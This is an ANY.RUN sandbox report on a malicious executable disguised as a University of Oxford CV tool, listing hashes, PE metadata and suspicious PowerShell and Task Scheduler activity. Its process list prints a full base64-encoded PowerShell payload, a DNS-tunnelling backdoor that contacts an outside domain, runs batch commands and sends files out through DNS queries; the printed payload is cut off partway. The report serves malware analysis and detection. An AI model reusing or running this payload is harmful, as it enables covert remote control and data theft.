File name:

f77ee804de304f7c3ea6b87824684b33

Full analysis: https://app.any.run/tasks/a2c0360b-970e-4182-a42c-2072fe991dda
Verdict: Malicious activity
Analysis date: December 18, 2018, 11:14:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

F77EE804DE304F7C3EA6B87824684B33

SHA1:

3BF06FFC1A7808A41367F69325937B9F5EDC9BDB

SHA256:

CE953229B8D8D71B83CF9A4B784F1A221DF4E798FD9EA9C35F24AC45CE5485BE

SSDEEP:

49152:lcPO0P1hBnZLLn+RnVrh2qZL6r7N0FaSKd4OsmCk:ixPxnZ/n+Rnf2qZ+/N0TKd4OsmCk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • f77ee804de304f7c3ea6b87824684b33.exe (PID: 3628)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3780)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3252)
      • powershell.exe (PID: 3484)
      • powershell.exe (PID: 1920)
      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 3816)
      • powershell.exe (PID: 3700)
      • powershell.exe (PID: 2884)
      • powershell.exe (PID: 2896)
    • Executes PowerShell scripts

      • f77ee804de304f7c3ea6b87824684b33.exe (PID: 3628)
      • WScript.exe (PID: 3340)
      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1920)
      • powershell.exe (PID: 3816)
      • powershell.exe (PID: 3700)
    • Reads Internet Cache Settings

      • f77ee804de304f7c3ea6b87824684b33.exe (PID: 3628)
    • Application launched itself

      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 1920)
      • powershell.exe (PID: 3816)
      • powershell.exe (PID: 3700)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (38.2)
.exe | Win32 EXE Yoda's Crypter (37.5)
.dll | Win32 Dynamic Link Library (generic) (9.2)
.exe | Win32 Executable (generic) (6.3)
.exe | Win16/32 Executable Delphi generic (2.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 1992:06:20 00:22:17+02:00
PEType: PE32
LinkerVersion: 2.25
CodeSize: 638976
InitializedDataSize: 32768
UninitializedDataSize: 1380352
EntryPoint: 0x1ed370
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.2.0.0
ProductVersionNumber: 2.2.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: ASCII
CompanyName: University Of Oxford
FileDescription: -
FileVersion: 2.2.0.0
InternalName: OxfordSymposiumRegTool
LegalCopyright: -
LegalTrademarks: -
OriginalFileName: OxfordSymposiumRegTool
ProductName: University Of Oxford CV creator
ProductVersion: 2.2.0.0

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 19-Jun-1992 22:22:17
Detected languages:
  • English - United States
CompanyName: University Of Oxford
FileDescription: -
FileVersion: 2.2.0.0
InternalName: OxfordSymposiumRegTool
LegalCopyright: -
LegalTrademarks: -
OriginalFilename: OxfordSymposiumRegTool
ProductName: University Of Oxford CV creator
ProductVersion: 2.2.0.0

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0050
Pages in file: 0x0002
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x000F
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x001A
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000100

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 19-Jun-1992 22:22:17
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_BYTES_REVERSED_HI
  • IMAGE_FILE_BYTES_REVERSED_LO
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00151000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x00152000
0x0009C000
0x0009C000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.99945
.rsrc
0x001EE000
0x00008000
0x00007200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.54381

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.12735
702
UNKNOWN
English - United States
RT_MANIFEST
2
7.24092
308
UNKNOWN
UNKNOWN
RT_CURSOR
3
7.32611
308
UNKNOWN
UNKNOWN
RT_CURSOR
4
7.96094
4268
UNKNOWN
UNKNOWN
RT_CURSOR
5
7.37615
308
UNKNOWN
UNKNOWN
RT_CURSOR
6
7.29437
308
UNKNOWN
UNKNOWN
RT_CURSOR
7
7.3232
308
UNKNOWN
UNKNOWN
RT_CURSOR
8
7.95807
4268
UNKNOWN
UNKNOWN
RT_CURSOR
9
7.35209
308
UNKNOWN
UNKNOWN
RT_CURSOR
10
7.26363
308
UNKNOWN
UNKNOWN
RT_CURSOR

Imports

KERNEL32.DLL
MsVfW32.dll
advapi32.dll
comctl32.dll
comdlg32.dll
gdi32.dll
ole32.dll
oleaut32.dll
shell32.dll
user32.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
11
Malicious processes
2
Suspicious processes
4

Behavior graph

Click at the process to see the details
start f77ee804de304f7c3ea6b87824684b33.exe no specs powershell.exe no specs powershell.exe no specs schtasks.exe no specs wscript.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1920"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Libraries\RecordedTV\DnE1.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
2884"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgB1AHAAZABhAHQAZQByAC4AbABpACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAnACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAA9ACAAJwAjACMAIwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQAgAD0AIAAiACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcACIAOwANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAKAAkAGQAZQBjAE4AdQBtAD0AIgAiACkADQAKAHsADQAKACAAIAAgACAAJABkAGUAYwBOAHUAbQAgACUAPQAgADQANgA2ADUANgA7AA0ACgAgACAAIAAgACQAYQBsAHAAaABhAGIAZQB0ACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAIgA7AA0ACgAgACAAIAAgAGQAbwANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAbQBhAGkAbgBkAGUAcgAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAlACAAMwA2ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYwBoAGEAcgAgAD0AIAAkAGEAbABwAGgAYQBiAGUAdAAuAHMAdQBiAHMAdAByAGkAbgBnACgAJAByAGUAbQBhAGkAbgBkAGUAcgAsADEAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAgAD0AIAAiACQAYwBoAGEAcgAkAGIAYQBzAGUAMwA2AE4AdQBtACIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMATgB1AG0AIAA9ACAAKAAkAGQAZQBjAE4AdQBtACAALQAgACQAcgBlAG0AYQBpAG4AZABlAHIAKQAgAC8AIAAzADYAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAHcAaABpAGwAZQAgACgAJABkAGUAYwBOAHUAbQAgAC0AZwB0ACAAMAApADsADQAKACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAuAFAAYQBkAEwAZQBmAHQAKAAzACwAJwAwACcAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABTAHUAYgAoACQAbQB5AGYAbABhAGcAMgAsACAAJABjAG0AZABpAGQAPQAnADAAMAAnACwAIAAkAHAAYQByAHQAaQBkAD0AJwAwADAAMAAnACkADQAKAHsADQAKACAAIAAgACAAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAwACkADQAKACAAIAAgACAAewANAAoACQAJACgAJwB6AHoAMAAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJwAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAyACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJABjAG0AZABpAGQAKwAkAHAAYQByAHQAaQBkACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAdAByADIASABlAHgAKAAkAG0AeQBzAHQAcgApAA0ACgB7AA0ACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBCAGkAdABDAG8AbgB2AGUAcgB0AGUAcgBdADoAOgBUAG8AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHkAcwB0AHIAKQApAC4AUgBlAHAAbABhAGMAZQAoACIALQAiACwAIAAiACIAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAAtAGUAcQAgACcAIwAnACsAJwAjACMAJwApAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgAgADAAOwANAAoACQB9AA0ACgAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADEAKQArACcAMwAwACcAKQA7AA0ACgAgACAAIAAgACQAcwB1AGIAIAA9ACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAyADMAMgBBACcAKQAgACsAIAAoAFMAdAByADIASABlAHgAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACkAOwANAAoAIAAgACAAIAAkAGkAIAA9ACAAMQA7AA0ACgAgACAAIAAgACQAcgBlAHQAIAA9ACAAMAA7AA0ACgAgACAAIAAgAHcAaABpAGwAZQAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQB0ACAAPQAgADEAOwANAAoAIAAgACAAIAAgACAAIAAgACQAcwB1AGIAMgAgAD0AIAAkAHMAdQBiACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAaQApADsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAkAHMAdQBiADIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHQAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAcgBlAHQAOwANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAJABkACkADQAKAHsADQAKAAkAJABjAG4AdAAgAD0AIAAwADsADQAKAAkAdwBoAGkAbABlACAAKAAkAGMAbgB0ACAALQBsAHQAIAAyADAAKQANAAoACQB7AA0ACgAJAAkAdAByAHkADQAKAAkACQB7AA0ACgAJAAkACQAkAG0AeQBkAGEAdABhACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAZAArACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAHMAdAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AFsAMABdACkAOwANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoACQAbQB5AGQAYQB0AGEAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAfQApADsADQAKAAkACQAJACQAYwBuAHQAIAA9ACAAMgA1ADsADQAKAAkACQB9AA0ACgAJAAkAYwBhAHQAYwBoAA0ACgAJAAkAewANAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBtACAANQAwADAAOwANAAoACQAJAAkAJABjAG4AdAArACsAOwANAAoACQAJAH0ADQAKAAkAfQANAAoAIAAgACAAIABpAGYAKAAtAG4AbwB0ACgAJABjAG4AdAAgAC0AZQBxACAAMgA1ACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnACMAJwArACcAIwAjACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADAAIAAtAGEAbgBkACAAJABtAHkAZABhAHQAYQAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAnADMAMwAuADMAMwAuACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHUAYgBTAHQAcgBpAG4AZwAoADYAKQAuAFMAcABsAGkAdAAoACcALgAnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAwAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADEAXQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAbQB5AGQAYQB0AGEALgBFAHEAdQBhAGwAcwAoACcAMwA1AC4AMwA1AC4AMwA1AC4AMwA1ACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMAA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBBAHAAcABlAG4AZABBAGwAbABUAGUAeAB0ACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACwAIAAoACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADIAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMwBdACkAKQApADsADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABlAGwAcwBlAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAnACMAJwArACcAIwAjACcAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApAFsAMABdACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGIAYQB0AHAAYQB0AGgAKQANAAoAewANAAoAIAAgACAAIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYgBhAHQAcABhAHQAaAApAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAOwANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZABGAGkAbABlACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AEYAaQBsAGUATgBhAG0AZQBXAGkAdABoAG8AdQB0AEUAeAB0AGUAbgBzAGkAbwBuACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAG0AeQBzAHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAG0AeQBGAGkAbABlAFAAYQB0AGgAKQA7AA0ACgAgACAAIAAgACQAaQA9ADAAOwANAAoAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACQAagA9ADAAOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAGkAIAAtAGwAZQAgACQAbQB5AHMAdAByAC4ATABlAG4AZwB0AGgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgACsAPQAgACQAbQB5AHMAdAByAFsAJABpAF0AOwANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAKAAkAGkAJQAyADQAKQAgAC0AZQBxACAAMgAzACkAIAAtAG8AcgAgACgAJABpACAALQBlAHEAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbQB5AGgAZQB4ACAAPQAgAFMAdAByADIASABlAHgAIAAkAG0AeQB0AGUAbQBwADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADIAIAAkAG0AeQBGAGkAbABlAE4AYQBtAGUAIAAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAkAGoAKQApACAAKwAgACQAbQB5AGgAZQB4ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqACsAKwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABJAEQADQAKAHsADQAKAAkAJAB2AGEAbABpAGQAYwBoAGEAcgBzACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABxAHIAcwB0AHUAdgB3AHgAeQB6ACIAOwANAAoAIAAgACAAIAAkAHQAaQBkACAAPQAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADAAKQArACcAMwAwACcAKQA7AA0ACgAJAGkAZgAgACgAJAB2AGEAbABpAGQAYwBoAGEAcgBzAC4AQwBvAG4AdABhAGkAbgBzACgAJAB0AGkAZAApACkAewAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAA9ACQAdABpAGQAOwB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABDAGgAYQBuAGcAZQBUAGgAaQBzAEYAaQBsAGUAIAAoACQAYgBvAHQAaQBkACkADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAoACcAIwAnACsAJwAjACMAJwApACkAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAJABmAGMAPQAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTADEALgBwAHMAMQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQANwApAC4AVAByAGkAbQBFAG4AZAAoACcAIgAnACcAfQAiACcAKQA7AA0ACgAJAAkAJABmAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGMAKQApADsADQAKAAkACQAkAGYAYwA9ACQAZgBjACAALQByAGUAcABsAGEAYwBlACAAKAAnACMAJwArACcAIwAjACcAKQAsACQAYgBvAHQAaQBkADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgAmAHsAaQBlAHgAIAAnACcAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgAnACsAJABmAGMAKwAnACIAJwAnAH0AIgAnADsADQAKAAkACQBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAxAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0